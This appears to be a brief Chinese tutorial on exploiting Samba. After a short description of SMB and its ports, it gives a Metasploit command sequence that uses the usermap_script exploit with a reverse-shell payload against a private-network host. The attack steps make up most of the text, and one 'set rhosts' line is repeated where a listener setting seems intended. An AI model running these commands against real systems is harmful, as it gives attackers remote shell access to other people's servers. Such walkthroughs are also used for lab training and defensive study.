一、介绍
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB( Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。一般运行在139、445端口
二、端口探测
三、漏洞利用
use exploit/multi/samba/usermap_script
show options
set rhosts 192.168.1.106
show payloads
payload/cmd/unix/reverse
show options
set rhosts 192.168.1.106
exploit